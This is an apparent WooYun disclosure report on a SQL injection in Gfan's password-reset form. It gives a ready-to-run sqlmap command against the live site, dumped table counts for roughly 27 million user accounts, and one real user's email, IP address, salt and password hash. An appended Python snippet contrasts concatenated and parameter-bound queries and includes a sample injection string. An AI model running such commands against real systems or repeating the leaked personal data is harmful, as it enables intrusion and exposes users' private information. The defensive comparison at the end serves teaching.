
Gfan (机锋网) has a high-severity SQL injection that may lead to the leak of 27 million users' data

2015-02-09 01:41

sqlmap -u "http://my.gfan.com/resete" --data="cellphone=*&confirmPassword=g00dPa%24%24w0rD&password=g00dPa%24%24w0rD&uid=" --dbms=MySQL --risk=3 --level=5 --count -D ucenter --threads=10

Proof of vulnerability:

Database: ucenter
+-------------------------+----------+
| Table                   | Entries  |
+-------------------------+----------+
| uc_memberfields         | 27862576 |
| uc_members              | 27862067 |
| uc_friends              | 9853831  |
| uc_cloudphonelog        | 3636389  |
| uc_pms                  | 3634833  |
| uc_token                | 1702842  |
| uc_newpm                | 650846   |
| uc_pm_members           | 515138   |
| uc_pm_indexes           | 436883   |
| uc_pm_lists             | 274433   |
| uc_cloudphone           | 210108   |
| uc_mms_log              | 86567    |
| uc_pm_messages_8        | 44385    |
| uc_pm_messages_4        | 44165    |
| uc_pm_messages_2        | 43860    |
| uc_pm_messages_0        | 43800    |
| uc_pm_messages_5        | 43590    |
| uc_pm_messages_9        | 43586    |
| uc_pm_messages_3        | 43379    |
| uc_pm_messages_1        | 43298    |
| uc_pm_messages_7        | 43199    |
| uc_pm_messages_6        | 43041    |
+-------------------------+----------+

Table: uc_members
[1 entry]
+------+---------+---------+------+--------+----------------+------------------+---------+------------+----------+----------+----------------------------------+-----------+------------+-------------+--------------+---------------+
| uid | myid | myidkey | flag | salt | regip | email | secques | regdate | username | g_volume | password | resetname | phone_imei | lastloginip | is_assistant | lastlogintime |
+------+---------+---------+------+--------+----------------+------------------+---------+------------+----------+----------+----------------------------------+-----------+------------+-------------+--------------+---------------+
| 1008 | <blank> | <blank> | NULL | b54445 | 116.30.184.219 | szwzx44h@163.com | <blank> | 1239851857 | lookb | 10 | cd50675168dbe5cc43d437e7e302c66f | 0 | <blank> | 11630 | 0 | 1243392500 |
+------+---------+---------+------+--------+----------------+------------------+---------+------------+----------+----------+----------------------------------+-----------+------------+-------------+--------------+---------------+

Fix:

Keep it up
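
The injectable field in the command above is the `cellphone` POST parameter of the password-reset form. As an added example (not code from the original report or from Gfan), the Python below contrasts a string-concatenated lookup with a bound-parameter one; it uses sqlite3 in place of the site's MySQL, and the table layout, function names and phone-number format are assumptions.

```python
import re
import sqlite3

CELLPHONE_RE = re.compile(r"1\d{10}")  # assumed format: 11-digit mobile number

def make_db():
    """Constructed stand-in table; the real schema behind the form is not shown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (uid INTEGER PRIMARY KEY, cellphone TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [(1, "13800000001"), (2, "13800000002")])
    return db

def lookup_concat(db, cellphone):
    """Vulnerable pattern: the request value is pasted into the SQL text."""
    sql = "SELECT uid FROM members WHERE cellphone = '" + cellphone + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, cellphone, validate=True):
    """Hardened pattern: check the format, then bind the value as a parameter."""
    if validate and not CELLPHONE_RE.fullmatch(cellphone):
        raise ValueError("cellphone must be an 11-digit mobile number")
    sql = "SELECT uid FROM members WHERE cellphone = ?"
    return [row[0] for row in db.execute(sql, (cellphone,))]

if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # constructed input containing SQL syntax
    print("concatenated:", lookup_concat(db, probe))        # matches every row
    print("bound:", lookup_bound(db, probe, validate=False))  # matches nothing
    try:
        lookup_bound(db, probe)
    except ValueError as exc:
        print("rejected:", exc)
    print("valid number:", lookup_bound(db, "13800000002"))
```

Binding alone is what stops the value from being parsed as SQL; the format check is a second layer that rejects malformed input before it reaches the database.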


Source: www.wooyun.org/bugs/wooyun-2015-088560
